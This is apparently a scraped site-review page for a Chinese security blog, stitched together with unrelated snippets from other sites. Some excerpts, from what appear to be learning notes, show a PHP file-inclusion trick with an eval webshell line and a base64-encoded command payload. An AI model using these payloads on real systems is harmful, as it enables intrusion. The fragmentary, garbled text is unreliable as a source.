CODERSEC.NET
bsmali4的小窝明明真的很帅~
http://www.codersec.net/
明明真的很帅~
http://www.codersec.net/
TODAY'S RATING
>1,000,000
Date Range
HIGHEST TRAFFIC ON
Saturday
LOAD TIME
0.8 seconds
PAGES IN
THIS WEBSITE
12
SSL
EXTERNAL LINKS
56
SITE IP
151.101.192.133
LOAD TIME
0.813 sec
SCORE
6.2
bsmali4的小窝 | codersec.net Reviews
https://codersec.net
明明真的很帅~
codersec.net
个人博客折腾笔记
http://www.codersec.net/2016/12/个人博客搭建笔记
没错,域名就是你的帐号 github.io,然后你可以直接去访问这个域名,或者也可以自己去买一个域名,(新网,万网,西部数码都可以)最后进行dns解析一类的操作,就把你的域名绑定xx.github.io上了。 项目地址, https:/ github.com/bsmali4/bsmali4.github.io. 我写的这篇文章,使用markdown写的,他的实际目录就在https:/ github.com/bsmali4/bsmali4.github.io/tree/master/ posts/2016-12-07-个人博客搭建笔记.md下面。 2缺点 缺点一:由于没有wordpress后台那么强大编辑器,很多操作不是很方便,不过好在支持markdown,你可以下一个markdown编辑器,好像收费,我这里找了一款开源的免费程序,只支持mac, macdown. 很多教程都是新建一个代码仓库,名字必须为你的github帐号名 github.io 比如我的仓库名字就是bsmali4.github.io,以这个为名字他会懂识别然后分配一个博客给你。 Git commit -m "change". 然后添加两...
铁人下载系统代码审计
http://www.codersec.net/2016/12/铁人下载系统代码审计
全局搜索一下 RuanjianMysql.java中 Chaxun函数 Zuixin函数 Tuijian函数 Paixing函数 Chuang函数 只有一处调用了 看样子是管理后台,这个后台的就不用管了,你都能进后台了还要啥注入,除非root权限写 shell. Int pageNo = 1; int pageSize = 12; String strpageNo = request.getParameter("pageNo"); if(strpageNo! StrpageNo.equals(" ) { pageNo = Integer.parseInt(strpageNo); } pageModel pagemodel = Ruanjianguanli.getInstance().Tuijian(pageNo,pageSize); %. ItemisFormField() { String name = item.getName(); long size = item.getSize(); if(name! 0L) { Matcher m = p.matcher(name); boolean ...
我的收藏
http://www.codersec.net/links
远程包含漏洞的利用小技巧
http://www.codersec.net/2016/12/远程包含漏洞的利用小技巧
Php require once("$ GET[id]");? Id=php:/ filter/read=convert.base64-encode/resource=index.php 所以理所当然地认为php:/ input也是可以的。 Http:/ www.codersec.net/index.php? Php eval($ POST['c']);? Http:/ www.codersec.net/index.php? Php eval($ POST['c']);? C=@eval(base64 decode($ POST[z0]) ;&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0 fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5...
小小的总结和对未来的憧憬
http://www.codersec.net/2017/01/小小的总结和对未来的憧憬
天才在左疯子在右 以阅读40% 感悟 刚开始读的时候,觉得有些想法真的天马行空,关于蚂蚁那集,和我小时候很像,原来我也是一个游走于疯子和天才之间的普通人。 雀斑 90% 感悟 这又是一篇青春伤痛文学,讲的套路和左耳很相似,看得过程中沉浸其中,看完之后,觉得没有一点收获。 人类简史 无声告白 岛上书店 白夜行.
TOTAL PAGES IN THIS WEBSITE
12
逆向路由器固件之SQL注入 | xd_xd's blog
http://xdxd.love/2016/09/20/逆向路由器固件之SQL注入
發表於 Sep 20 2016. Rootfs git:(master) find . -name my cgi .cgi. Usr/bin/my cgi .cgi. Rootfs git:(master) file ./usr/bin/my cgi .cgi. Usr/bin/my cgi .cgi. Bit LSB executable, MIPS, MIPS-II version 1. SYSV), dynamically linked (uses shared libs), stripped. 查询 select level from user where user name 字符串,可以定位到do login函数。 Or level = ( select.
Mac关闭rootless教程 - LMva's Blog
https://www.lmva.cc/index.php/archives/112
本文由 LMva 发表于 2016 年 04 月 10 日. 2重启电脑开后按住 Command-R 进入恢复分区. 然后在 实用工具 栏找到 终端启动运行. Csrutil disable; reboot. 4最后就是重新激活 Rootless的方法了. 终端内输入.
分类 码农生涯 下的文章 - LMva's Blog
https://www.lmva.cc/index.php/category/program
CSS body{ user-select: none; -ms-user-select: none; /*IE10*/ -moz-user-select: none; /*火狐浏览器*/ -khtml-user-select: none; /*早期浏览器*/ -webkit-user-select: none; /*webkit浏览器*/ }. EVILCOS 以黑客那种邪气看待世界 By 余弦. 暗月博客 网络安全,WEB渗透,数据安全,渗透编程,安全培训. 90' s Blog 关注网络信息安全. Seay博客 渗透 编程 创业 代码审计 安全维护 致力于更专业的网络安全博客. AptSec Team - 记录我们成长的地方. Kali linux论坛(Backtrack) bt3 bt4 bt5 Metasploit Nessus-关注互联网安全动态.
Mac下配置终端。 - LMva's Blog
https://www.lmva.cc/index.php/archives/132
本文由 LMva 发表于 2016 年 05 月 05 日. Curl -LsSf http:/ github.com/mxcl/homebrew/tarball/master sudo tar xvz -C/usr/local - strip 1. Grew install git grew install wget. Git clone git:/ github.com/robbyrussell/oh-my-zsh.git /.oh-my-zsh. Cp /oh-my-zsh/templates/zshrc.zsh-template /.zshrc.
Mac/Linux安装ZSH - LMva's Blog
https://www.lmva.cc/index.php/archives/125
本文由 LMva 发表于 2016 年 04 月 10 日. Git clone git:/ github.com/robbyrussell/oh-my-zsh.git /.oh-my-zsh. 2 如果你已存在 /.zshrc文件,则备份现有的 /.zshrc文件. Cp /zshrc /.zshrc.orig. Cp /oh-my-zsh/templates/zshrc.zsh-template /.zshrc. Cp /oh-my-zsh/templates/zshrc.zsh-template /.zshrc.
LMva's Blog
https://www.lmva.cc/index.php/page/4
EVILCOS 以黑客那种邪气看待世界 By 余弦. 暗月博客 网络安全,WEB渗透,数据安全,渗透编程,安全培训. 90' s Blog 关注网络信息安全. Seay博客 渗透 编程 创业 代码审计 安全维护 致力于更专业的网络安全博客. AptSec Team - 记录我们成长的地方. Kali linux论坛(Backtrack) bt3 bt4 bt5 Metasploit Nessus-关注互联网安全动态. Cent OS 配置 lamp环境。 Yum install httpd mysql-server php php-devel php-mysql. 要想在linux上实现网页服务器 www 需要Apache这个服务器软件,不过Apache仅能提供最基本的静态网站数据而已,想要实现动态网站的话,最好还是要PHP与MySQL的支持,所以下面我们将会以LAMP linux Apache MySQL PHP 作为安装与设置的介绍。 Httpd mysql mysql-Server php php-devel php-mysql. Chmod -R 755 /root. ServerName cl...
一个简单的mips架构缓冲区溢出分析 | xd_xd's blog
http://xdxd.love/2016/11/19/一个简单的mips架构缓冲区溢出分析
發表於 Nov 19 2016. NPlease input your Password: ". Welcome to the new world n". Bin/mipsel-linux-gcc secret.c -o secret - static. Signal 11 (Segmentation fault) - core dumped Segmentation fault. 0x88 var 4( $sp. 0x88 var 8( $sp. 0x88 var 78( $sp. 0x47 # ' G. APleaseInputYou - 0x470000) # " nPlease input your Password: ". Printf nop lw $gp. 0x88 var 78( $fp. 0x47 # ' G. AS 2 - 0x470000) # "%s". 0x88 var 70 move. Isoc99 scanf nop lw $gp. 0x88 var 78( $fp. 0x88 var 70 move. 0x88 var 4( $sp. 0x88 var 8( $sp.
小脚本之监控论坛帖子更新并发送邮件通知 | xd_xd's blog
http://xdxd.love/2016/09/26/小脚本之监控论坛帖子更新并发送邮件通知
發表於 Sep 26 2016. Url = 'http:/ www.test.net/forum.php? Headers = { 'user-agent'. Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.76 Mobile Safari/537.36'. R = requests.get(url, headers=headers) soup = BeautifulSoup(r.text) newest = soup.find( 'span'. While True: try: thenexttitle = getnewesttitle. Print newesttitle. encode. Print thenexttitle. encode. Newesttitle: newesttitle = thenexttitle send mail. Pass except RuntimeError: print.
TOTAL LINKS TO THIS WEBSITE
56
CodersDiscuss.com | Question and answer site for coders
Question and answer site for coders. Obtaining the prior month about the last day of the month. June 4, 2014. I’ve a question that i work every day at 3 AM to provide the revenue of the present month to me. The issue occur in the last day of every month. Since The month has turned. Then when i operate at 1st December 3 AM 0 is given by it. While it will provide me […]. HasClass to exclude div from pot occasion. June 4, 2014. C MongoClient catalog marketing for large information volume positions. I do wan...
codersdomain.com - Registered at Namecheap.com
This domain is registered at Namecheap. This domain was recently registered at Namecheap. Please check back later! This domain is registered at Namecheap. This domain was recently registered at Namecheap. Please check back later! The Sponsored Listings displayed above are served automatically by a third party. Neither Parkingcrew nor the domain owner maintain any relationship with the advertisers.
Coders Dream - Coming Soon Page
Welcome to Coders Dream. This year I went to Cancun and stayed at the Ritz-Carlton for my birthday and was inspired to add a section to my blog for the travel experiences I have both for work and for fun! I had an amazing experience and have decided to add travel.codersdream.com along with the normal blog to speak more about it and show you my experiences. Site should be up by end of the week.
Laundry Shop Williamsport, PA - Coder's Dry Cleaning & Laundry
Williamsport, PA Laundry Shop. Coder's Dry Cleaning and Laundry. Coder's Dry Cleaning and Laundry is a laundry shop in Williamsport, PA. We offer top quality dry cleaning and laundry services that keep your clothes looking terrific for and lasting longer. We also offer alterations, repairs, and many more services. Learn More About Coder's Dry Cleaning and Laundry:. Suede and leather cleaning. Heavy starch and FR clothing / coveralls. Address / Get Directions. Coder's Dry Cleaning and Laundry.
bsmali4的小窝
Php require once("$ GET[id]");? Id=php:/ filter/read=convert.base64-encode/resource=index.php所以理所当然地认为php:/ input也是可以的。 1安装问题没有删除安装页面,老生常谈的重复安装# # 2.注入问题先测试下基本的功能,试试搜索找到so.jsp ,跟踪发现被带入发编译找到Ruanjianguanli,找到so函数,ruanjianDao其实是个接口,说明ruanjianDao向上转型了。 可以想象一台公网vps机器映射了无数台web虚拟机)# 实验环境(情况一)# # 攻击机器kali一台 (10.211.55.3)# # 靶机 .…. 漏洞复现 jmx-console先安装docker镜像,docker pull tutum/jboss:as5然后docker run -d -p 8080:8080 -p 9990:9990 -e JBOSS PASS="mypass" tutum/jboss管理器的地址是http:/ 127.0.0.….
coder section
Our team is made up of designers, developers, strategists and writers. We pride ourselves on collaborative development and flexibility, resulting in projects that consistently exceed the expectations of our partners and their customers. In simple terms, we like what we do. We'll talk through your hopes and aspirations and add our own thoughts to the mix. Before diving in, it can be useful to validate your idea with potential users or investors. We'll provide a range of tools and share our connections.
Codersedge – emboldened by passion
Looking for a Website? At Codersedge, We Design creative and professional website. Whether you are a start-up or an established business, we are ready to assist you at every stage of the software development life cycle from conceptualization and consulting to development and support. Our software engineers have a wealth of experience in building web applications. We are also experts in many verticals and business domains, including e-Commerce, e-Learning, AdTech, Finance, Entertainment, and more.
Techno Solutions
Wednesday, 10 September 2014. Simple AJAX example in JSP/Servlet. Asynchronous JavaScript and XML. Is a group of interrelated Web development techniques used on the client-side to create asynchronous Web applications. With Ajax, Web applications can send data to, and retrieve data from, a server asynchronously (in the background) without interfering with the display and behavior of the existing page. Data can be retrieved using the XMLHttpRequest object. Title My Page /title. Var xmlHttp = false;. Var em...
Coderseeker.com
This domain may be for sale. Backorder this Domain. This Domain Name Has Expired - Renewal Instructions.
phpwind
X9519;误信息:. X94FE;接地址(The URL Is):. Http:/ www.coderself.com/index.php. MySQL服务器错误(MySQL Server Error):. No such file or directory ( 2002 ) 查看错误相关信息. X5BFB;求帮助(You Can Get Help In):. Http:/ www.phpwind.net.